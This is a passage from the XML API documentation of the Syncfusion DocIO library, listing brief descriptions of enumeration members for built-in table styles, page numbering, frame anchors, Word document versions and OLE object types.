        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShadingAccent3">
            <summary>
            Light shading accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShadingAccent4">
            <summary>
            Light shading accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShadingAccent5">
            <summary>
            Light shading accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShadingAccent6">
            <summary>
            Light shading accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightList">
            <summary>
            Light List style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightListAccent1">
            <summary>
            Light list accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightListAccent2">
            <summary>
            Light list accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightListAccent3">
            <summary>
            Light list accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightListAccent4">
            <summary>
            Light list accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightListAccent5">
            <summary>
            Light list accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightListAccent6">
            <summary>
            Light list accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGrid">
            <summary>
            Light grid style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGridAccent1">
            <summary>
            Light grid accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGridAccent2">
            <summary>
            Light grid accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGridAccent3">
            <summary>
            Light grid accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGridAccent4">
            <summary>
            Light grid accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGridAccent5">
            <summary>
            Light grid accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightGridAccent6">
            <summary>
            Light grid accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1">
            <summary>
            Medium shading 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1Accent1">
            <summary>
            Medium shading 1 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1Accent2">
            <summary>
            Medium shading 1 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1Accent3">
            <summary>
            Medium shading 1 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1Accent4">
            <summary>
            Medium shading 1 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1Accent5">
            <summary>
            Medium shading 1 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading1Accent6">
            <summary>
            Medium shading 1 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2">
            <summary>
            Medium shading 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2Accent1">
            <summary>
            Medium shading 2 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2Accent2">
            <summary>
            Medium shading 2 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2Accent3">
            <summary>
            Medium shading 2 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2Accent4">
            <summary>
            Medium shading 2 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2Accent5">
            <summary>
            Medium shading 2 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumShading2Accent6">
            <summary>
            Medium shading 2 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1">
            <summary>
            Medium list 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1Accent1">
            <summary>
            Medium list 1 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1Accent2">
            <summary>
            Medium list 1 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1Accent3">
            <summary>
            Medium list 1 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1Accent4">
            <summary>
            Medium list 1 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1Accent5">
            <summary>
            Medium list 1 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList1Accent6">
            <summary>
            Medium list 1 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2">
            <summary>
            Medium list 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2Accent1">
            <summary>
            Medium list 2 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2Accent2">
            <summary>
            Medium list 2 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2Accent3">
            <summary>
            Medium list 2 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2Accent4">
            <summary>
            Medium list 2 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2Accent5">
            <summary>
            Medium list 2 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumList2Accent6">
            <summary>
            Medium list 2 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1">
            <summary>
            Medium grid 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1Accent1">
            <summary>
            Medium grid 1 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1Accent2">
            <summary>
            Medium grid 1 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1Accent3">
            <summary>
            Medium grid 1 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1Accent4">
            <summary>
            Medium grid 1 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1Accent5">
            <summary>
            Medium grid 1 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid1Accent6">
            <summary>
            Medium grid 1 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2">
            <summary>
            Medium grid 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2Accent1">
            <summary>
            Medium grid 2 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2Accent2">
            <summary>
            Medium grid 2 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2Accent3">
            <summary>
            Medium grid 2 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2Accent4">
            <summary>
            Medium grid 2 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2Accent5">
            <summary>
            Medium grid 2 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid2Accent6">
            <summary>
            Medium grid 2 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3">
            <summary>
            Medium grid 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3Accent1">
            <summary>
            Medium grid 3 accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3Accent2">
            <summary>
            Medium grid 3 accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3Accent3">
            <summary>
            Medium grid 3 accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3Accent4">
            <summary>
            Medium grid 3 accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3Accent5">
            <summary>
            Medium grid 3 accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.MediumGrid3Accent6">
            <summary>
            Medium grid 3 accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkList">
            <summary>
            Dark list style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkListAccent1">
            <summary>
            Dark list accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkListAccent2">
            <summary>
            Dark list accent 2 style. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkListAccent3">
            <summary>
            Dark list accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkListAccent4">
            <summary>
            Dark list accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkListAccent5">
            <summary>
            Dark list accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.DarkListAccent6">
            <summary>
            Dark list accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShading">
            <summary>
            Colorful shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShadingAccent1">
            <summary>
            Colorful shading accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShadingAccent2">
            <summary>
            Colorful shading accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShadingAccent3">
            <summary>
            Colorful shading accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShadingAccent4">
            <summary>
            Colorful shading accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShadingAccent5">
            <summary>
            Colorful shading accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulShadingAccent6">
            <summary>
            Colorful shading accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulList">
            <summary>
            Colorful list style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulListAccent1">
            <summary>
            Colorful list accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulListAccent2">
            <summary>
            Colorful list accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulListAccent3">
            <summary>
            Colorful list accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulListAccent4">
            <summary>
            Colorful list accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulListAccent5">
            <summary>
            Colorful list accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulListAccent6">
            <summary>
            Colorful list accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGrid">
            <summary>
            Colorful grid style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGridAccent1">
            <summary>
            Colorful grid accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGridAccent2">
            <summary>
            Colorful grid accent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGridAccent3">
            <summary>
            Colorful grid accent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGridAccent4">
            <summary>
            Colorful grid accent 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGridAccent5">
            <summary>
            Colorful grid accent 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.ColorfulGridAccent6">
            <summary>
            Colorful grid accent 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.Table3Deffects1">
            <summary>
            Table 3 deffects 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.Table3Deffects2">
            <summary>
            Table 3 deffects 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.Table3Deffects3">
            <summary>
            Table 3 deffects 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableClassic1">
            <summary>
            Table classic 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableClassic2">
            <summary>
            Table classic 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableClassic3">
            <summary>
            Table classic 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableClassic4">
            <summary>
            Table classic 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColorful1">
            <summary>
            Table colorful 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColorful2">
            <summary>
            Table colorful 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColorful3">
            <summary>
            Table colorful 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColumns1">
            <summary>
            Table columns 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColumns2">
            <summary>
            Table columns 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColumns3">
            <summary>
            Table columns 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColumns4">
            <summary>
            Table columns 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableColumns5">
            <summary>
            Table columns 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableContemporary">
            <summary>
            Table contemporary style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableElegant">
            <summary>
            Table elegant style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid1">
            <summary>
            Table grid 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid2">
            <summary>
            Table grid 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid3">
            <summary>
            Table grid 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid4">
            <summary>
            Table grid 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid5">
            <summary>
            Table grid 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid6">
            <summary>
            Table grid 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid7">
            <summary>
            Table grid 7 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid8">
            <summary>
            Table grid 8 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList1">
            <summary>
            Table list 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList2">
            <summary>
            Table list 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList3">
            <summary>
            Table list 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList4">
            <summary>
            Table list 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList5">
            <summary>
            Table list 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList6">
            <summary>
            Table list 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList7">
            <summary>
            Table list 7 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableList8">
            <summary>
            Table list 8 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableProfessional">
            <summary>
            Table professional style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableSimple1">
            <summary>
            Table simple 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableSimple2">
            <summary>
            Table simple 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableSimple3">
            <summary>
            Table simple 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableSubtle1">
            <summary>
            Table subtle 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableSubtle2">
            <summary>
            Table subtle 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableTheme">
            <summary>
            Table theme style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableWeb1">
            <summary>
            Table web 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableWeb2">
            <summary>
            Table web 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableWeb3">
            <summary>
            Table web 3 style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ConditionalFormattingCode">
            <summary>
            Defines conditional formatting styles type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BorderSide">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PageNumberStyle">
            <summary>
            Specifies the number style for a page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberStyle.Arabic">
            <summary>
            Arabic.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberStyle.RomanUpper">
            <summary>
            Upper case roman.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberStyle.RomanLower">
            <summary>
            Lower case roman.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberStyle.LetterUpper">
            <summary>
            Upper case letter.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberStyle.LetterLower">
            <summary>
            Lower case letter.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PageNumberAlignment">
            <summary>
            Specifies the page number alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberAlignment.Left">
            <summary>
            Left alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberAlignment.Center">
            <summary>
            Center alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberAlignment.Right">
            <summary>
            Right alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberAlignment.Inside">
            <summary>
            Inside alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumberAlignment.Outside">
            <summary>
            Outside alignment.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FrameHorzAnchor">
            <summary>
            Specifies the horizontal frame anchor.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FrameVertAnchor">
            <summary>
            Specifies the vertical frame anchor.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FrameVerticalPosition">
            <summary>
            Specifies the vertical frame position.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XHTMLValidationType">
            <summary>
            Specifies the XHTML validation type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XHTMLValidationType.Strict">
            <summary>
            XHTML 1.0 validation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XHTMLValidationType.Transitional">
            <summary>
            XHTML 1.1 validation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XHTMLValidationType.None">
            <summary>
            No validation.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.GridPitchType">
            <summary>
            Specifies the type of grid pitch.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocumentVersion">
            <summary>
            Specifies the document creation version.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentVersion.Word97">
            <summary>
            Document created using Word 97
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentVersion.Word2000">
            <summary>
            Document created using Word 2000
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentVersion.Word2002">
            <summary>
            Document created using Word 2002
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentVersion.Word2003">
            <summary>
            Document created using Word 2003
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentVersion.Word2007">
            <summary>
            Document created using Word 2007
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CommentMarkType">
            <summary>
            Specifies the type of comment mark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CommentMarkType.CommentStart">
            <summary>
            Comment start mark type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CommentMarkType.CommentEnd">
            <summary>
            Comment end mark type
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.OleLinkType">
            <summary>
            Specifies the type of the ole object field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleLinkType.Embed">
            <summary>
            Ole object field type is EMBED.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleLinkType.Link">
            <summary>
            Ole object field type is LINK.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.OleObjectType">
            <summary>
            Specifies the type of OLE object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.Undefined">
            <summary>
            Type is not defined.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.AdobeAcrobatDocument">
            <summary>
            Adobe Acrobat Document. File has ".pdf" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.BitmapImage">
            <summary>
            Bitmap Image. File has ".png" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.MediaClip">
            <summary>
            Media Clip.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.Equation">
            <summary>
            Equation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.GraphChart">
            <summary>
            Graph Chart.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.Excel_97_2003_Worksheet">
            <summary>
            Excel 97-2003 Worksheet. File has ".xls" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.ExcelBinaryWorksheet">
            <summary>
            Excel Binary Worksheet. File has ".xlsb" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.ExcelChart">
            <summary>
            Excel chart. File has ".xls" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.ExcelMacroWorksheet">
            <summary>   
            Excel Macro-Enabled Worksheet. File has ".xlsm" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.ExcelWorksheet">
            <summary>
            Excel Worksheet. File has ".xlsx" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.PowerPoint_97_2003_Presentation">
            <summary>
            PowerPoint 97-2003 Presentation. File has ".ppt" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.PowerPoint_97_2003_Slide">
            <summary>
            PowerPoint 97-2003 Slide. File has ".sld" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.PowerPointMacroPresentation">
            <summary>
            PowerPoint Macro-Enabled Presentation. File has ".pptm" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.PowerPointMacroSlide">
            <summary>
            PowerPoint Macro-Enabled Slide. File has ".sldm" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.PowerPointPresentation">
            <summary>
            PowerPoint Presentation. File has ".pptx" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.PowerPointSlide">
            <summary>
            PowerPoint Slide. File has ".sldx" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.Word_97_2003_Document">
            <summary>
            Word 97-2003 Document. File has ".doc" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.WordDocument">
            <summary>
            Word Document. File has ".docx" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.WordMacroDocument">
            <summary>
            Word Macro-Enabled Document. File has ".docm" extension.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.VisioDrawing">
            <summary>
            Visio Deawing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.MIDISequence">
            <summary>
            MIDI Sequence.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenDocumentPresentation">
            <summary>
            OpenDocument Presentation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenDocumentSpreadsheet">
            <summary>
            OpenDocument Spreadsheet.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenDocumentText">
            <summary>
            OpenDocument Text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenOfficeSpreadsheet1_1">
            <summary>
            OpenOffice.org 1.1 Spreadsheet.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenOfficeText_1_1">
            <summary>
            OpenOffice.org 1.1 Text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.Package">
            <summary>
            Package.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.VideoClip">
            <summary>
            Video Clip.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.WaveSound">
            <summary>
            Wave Sound.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.WordPadDocument">
            <summary>
            WordPad Document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenOfficeSpreadsheet">
            <summary>
            OpenOffice spreadsheet.
            </summary>
        </member>
